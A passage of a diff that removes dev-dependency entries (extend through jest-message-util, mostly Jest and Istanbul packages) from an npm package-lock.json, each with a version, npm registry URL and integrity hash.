"jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "dev": true, - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dev": true, - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=", - "dev": true - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "dev": true, - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - 